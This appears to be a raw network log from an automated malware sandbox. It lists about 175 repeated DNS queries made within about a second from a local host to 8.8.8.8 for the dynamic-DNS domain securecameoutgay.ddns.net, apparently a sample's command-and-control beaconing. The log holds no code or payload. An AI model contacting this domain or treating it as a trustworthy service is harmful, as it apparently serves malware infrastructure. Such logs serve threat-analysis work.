                                                    Oct 12, 2024 23:05:41.971479893 CEST192.168.2.148.8.8.80xe66aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.978542089 CEST192.168.2.148.8.8.80xe66aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.986156940 CEST192.168.2.148.8.8.80xe66aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.992914915 CEST192.168.2.148.8.8.80xe66aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:41.999375105 CEST192.168.2.148.8.8.80xd0c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.006378889 CEST192.168.2.148.8.8.80xd0c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.013322115 CEST192.168.2.148.8.8.80xd0c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.019593954 CEST192.168.2.148.8.8.80xd0c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.025969028 CEST192.168.2.148.8.8.80xd0c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.032602072 CEST192.168.2.148.8.8.80x4115Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.039299965 CEST192.168.2.148.8.8.80x4115Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.045506001 CEST192.168.2.148.8.8.80x4115Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.052212000 CEST192.168.2.148.8.8.80x4115Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.058617115 CEST192.168.2.148.8.8.80x4115Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.064944029 CEST192.168.2.148.8.8.80x4e52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.071279049 CEST192.168.2.148.8.8.80x4e52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.077723980 CEST192.168.2.148.8.8.80x4e52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.084264040 CEST192.168.2.148.8.8.80x4e52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.090789080 CEST192.168.2.148.8.8.80x4e52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.097270966 CEST192.168.2.148.8.8.80xff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.104157925 CEST192.168.2.148.8.8.80xff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.110537052 CEST192.168.2.148.8.8.80xff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.117003918 CEST192.168.2.148.8.8.80xff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.123812914 CEST192.168.2.148.8.8.80xff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.130372047 CEST192.168.2.148.8.8.80x76e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.136611938 CEST192.168.2.148.8.8.80x76e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.142992020 CEST192.168.2.148.8.8.80x76e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.149677992 CEST192.168.2.148.8.8.80x76e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.156076908 CEST192.168.2.148.8.8.80x76e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.162590981 CEST192.168.2.148.8.8.80x97b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.169080019 CEST192.168.2.148.8.8.80x97b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.175405979 CEST192.168.2.148.8.8.80x97b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.181865931 CEST192.168.2.148.8.8.80x97b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.188271999 CEST192.168.2.148.8.8.80x97b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.194938898 CEST192.168.2.148.8.8.80x2486Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.201535940 CEST192.168.2.148.8.8.80x2486Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.208122015 CEST192.168.2.148.8.8.80x2486Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.214556932 CEST192.168.2.148.8.8.80x2486Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.220972061 CEST192.168.2.148.8.8.80x2486Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.227304935 CEST192.168.2.148.8.8.80xa709Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.233867884 CEST192.168.2.148.8.8.80xa709Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.240292072 CEST192.168.2.148.8.8.80xa709Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.246521950 CEST192.168.2.148.8.8.80xa709Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.253063917 CEST192.168.2.148.8.8.80xa709Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.259784937 CEST192.168.2.148.8.8.80x6fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.266103029 CEST192.168.2.148.8.8.80x6fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.272491932 CEST192.168.2.148.8.8.80x6fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.278954029 CEST192.168.2.148.8.8.80x6fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.285625935 CEST192.168.2.148.8.8.80x6fffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.292094946 CEST192.168.2.148.8.8.80x8723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.298649073 CEST192.168.2.148.8.8.80x8723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.304949999 CEST192.168.2.148.8.8.80x8723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.311491966 CEST192.168.2.148.8.8.80x8723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.318730116 CEST192.168.2.148.8.8.80x8723Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.325659990 CEST192.168.2.148.8.8.80xf1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.332494974 CEST192.168.2.148.8.8.80xf1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.339035988 CEST192.168.2.148.8.8.80xf1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.345530987 CEST192.168.2.148.8.8.80xf1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.351996899 CEST192.168.2.148.8.8.80xf1cdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.358371019 CEST192.168.2.148.8.8.80xf310Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.365010977 CEST192.168.2.148.8.8.80xf310Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.371757030 CEST192.168.2.148.8.8.80xf310Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.377981901 CEST192.168.2.148.8.8.80xf310Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.384574890 CEST192.168.2.148.8.8.80xf310Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.391190052 CEST192.168.2.148.8.8.80x4eacStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.397604942 CEST192.168.2.148.8.8.80x4eacStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.403805971 CEST192.168.2.148.8.8.80x4eacStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.410268068 CEST192.168.2.148.8.8.80x4eacStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.416807890 CEST192.168.2.148.8.8.80x4eacStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.423626900 CEST192.168.2.148.8.8.80xbaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.429970026 CEST192.168.2.148.8.8.80xbaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.436880112 CEST192.168.2.148.8.8.80xbaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.443414927 CEST192.168.2.148.8.8.80xbaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.449717045 CEST192.168.2.148.8.8.80xbaefStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.455872059 CEST192.168.2.148.8.8.80x7a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.462277889 CEST192.168.2.148.8.8.80x7a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.468832016 CEST192.168.2.148.8.8.80x7a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.475467920 CEST192.168.2.148.8.8.80x7a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.481949091 CEST192.168.2.148.8.8.80x7a47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.489367962 CEST192.168.2.148.8.8.80xabf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.495956898 CEST192.168.2.148.8.8.80xabf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.502361059 CEST192.168.2.148.8.8.80xabf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.508752108 CEST192.168.2.148.8.8.80xabf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.515127897 CEST192.168.2.148.8.8.80xabf7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.521601915 CEST192.168.2.148.8.8.80x7fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.528089046 CEST192.168.2.148.8.8.80x7fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.534234047 CEST192.168.2.148.8.8.80x7fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.540640116 CEST192.168.2.148.8.8.80x7fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.547173977 CEST192.168.2.148.8.8.80x7fedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.553611994 CEST192.168.2.148.8.8.80x7080Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.560208082 CEST192.168.2.148.8.8.80x7080Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.566381931 CEST192.168.2.148.8.8.80x7080Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.572741032 CEST192.168.2.148.8.8.80x7080Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.579696894 CEST192.168.2.148.8.8.80x7080Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.586617947 CEST192.168.2.148.8.8.80x64e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.593514919 CEST192.168.2.148.8.8.80x64e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.600016117 CEST192.168.2.148.8.8.80x64e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.606607914 CEST192.168.2.148.8.8.80x64e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.612961054 CEST192.168.2.148.8.8.80x64e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.619626999 CEST192.168.2.148.8.8.80x8bbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.626383066 CEST192.168.2.148.8.8.80x8bbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.632643938 CEST192.168.2.148.8.8.80x8bbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.639152050 CEST192.168.2.148.8.8.80x8bbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.646357059 CEST192.168.2.148.8.8.80x8bbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.652790070 CEST192.168.2.148.8.8.80x4343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.659147024 CEST192.168.2.148.8.8.80x4343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.665623903 CEST192.168.2.148.8.8.80x4343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.672038078 CEST192.168.2.148.8.8.80x4343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.678621054 CEST192.168.2.148.8.8.80x4343Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.685028076 CEST192.168.2.148.8.8.80x759Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.691581011 CEST192.168.2.148.8.8.80x759Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.697900057 CEST192.168.2.148.8.8.80x759Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.704509974 CEST192.168.2.148.8.8.80x759Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.710993052 CEST192.168.2.148.8.8.80x759Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.717403889 CEST192.168.2.148.8.8.80x3e05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.723927021 CEST192.168.2.148.8.8.80x3e05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.730607986 CEST192.168.2.148.8.8.80x3e05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.737066031 CEST192.168.2.148.8.8.80x3e05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.743608952 CEST192.168.2.148.8.8.80x3e05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.750020027 CEST192.168.2.148.8.8.80xb712Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.756192923 CEST192.168.2.148.8.8.80xb712Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.762790918 CEST192.168.2.148.8.8.80xb712Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.769160032 CEST192.168.2.148.8.8.80xb712Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.775729895 CEST192.168.2.148.8.8.80xb712Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.782172918 CEST192.168.2.148.8.8.80x4c98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.788461924 CEST192.168.2.148.8.8.80x4c98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.794747114 CEST192.168.2.148.8.8.80x4c98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.800960064 CEST192.168.2.148.8.8.80x4c98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.807400942 CEST192.168.2.148.8.8.80x4c98Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.813988924 CEST192.168.2.148.8.8.80xcdd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.820400000 CEST192.168.2.148.8.8.80xcdd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.826955080 CEST192.168.2.148.8.8.80xcdd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.833452940 CEST192.168.2.148.8.8.80xcdd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.839940071 CEST192.168.2.148.8.8.80xcdd3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.846326113 CEST192.168.2.148.8.8.80x8f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.852879047 CEST192.168.2.148.8.8.80x8f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.859309912 CEST192.168.2.148.8.8.80x8f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.866301060 CEST192.168.2.148.8.8.80x8f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.873179913 CEST192.168.2.148.8.8.80x8f45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.879606009 CEST192.168.2.148.8.8.80x2eb7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.886348963 CEST192.168.2.148.8.8.80x2eb7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.893040895 CEST192.168.2.148.8.8.80x2eb7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.899514914 CEST192.168.2.148.8.8.80x2eb7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.906080961 CEST192.168.2.148.8.8.80x2eb7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.912600994 CEST192.168.2.148.8.8.80x5812Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.919698000 CEST192.168.2.148.8.8.80x5812Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.926980972 CEST192.168.2.148.8.8.80x5812Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.933969975 CEST192.168.2.148.8.8.80x5812Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.940527916 CEST192.168.2.148.8.8.80x5812Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.946868896 CEST192.168.2.148.8.8.80x5dfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.953737974 CEST192.168.2.148.8.8.80x5dfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.961666107 CEST192.168.2.148.8.8.80x5dfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.968353033 CEST192.168.2.148.8.8.80x5dfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.974813938 CEST192.168.2.148.8.8.80x5dfeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.981313944 CEST192.168.2.148.8.8.80x5d51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.987761974 CEST192.168.2.148.8.8.80x5d51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:42.994215965 CEST192.168.2.148.8.8.80x5d51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.000829935 CEST192.168.2.148.8.8.80x5d51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.007174015 CEST192.168.2.148.8.8.80x5d51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.013569117 CEST192.168.2.148.8.8.80xfc8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.019881964 CEST192.168.2.148.8.8.80xfc8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.026109934 CEST192.168.2.148.8.8.80xfc8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.032457113 CEST192.168.2.148.8.8.80xfc8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.038911104 CEST192.168.2.148.8.8.80xfc8fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.045717955 CEST192.168.2.148.8.8.80xa453Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.052356005 CEST192.168.2.148.8.8.80xa453Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.058756113 CEST192.168.2.148.8.8.80xa453Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.065148115 CEST192.168.2.148.8.8.80xa453Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.071365118 CEST192.168.2.148.8.8.80xa453Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.077855110 CEST192.168.2.148.8.8.80x9432Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.084304094 CEST192.168.2.148.8.8.80x9432Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.091223955 CEST192.168.2.148.8.8.80x9432Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.097615957 CEST192.168.2.148.8.8.80x9432Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.103790045 CEST192.168.2.148.8.8.80x9432Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.110735893 CEST192.168.2.148.8.8.80xab56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.117917061 CEST192.168.2.148.8.8.80xab56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.124468088 CEST192.168.2.148.8.8.80xab56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.131165028 CEST192.168.2.148.8.8.80xab56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.138061047 CEST192.168.2.148.8.8.80xab56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.144696951 CEST192.168.2.148.8.8.80x3396Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.151068926 CEST192.168.2.148.8.8.80x3396Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.157705069 CEST192.168.2.148.8.8.80x3396Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.164599895 CEST192.168.2.148.8.8.80x3396Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.171509981 CEST192.168.2.148.8.8.80x3396Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.178122997 CEST192.168.2.148.8.8.80x9257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.184567928 CEST192.168.2.148.8.8.80x9257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.191299915 CEST192.168.2.148.8.8.80x9257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.198014975 CEST192.168.2.148.8.8.80x9257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
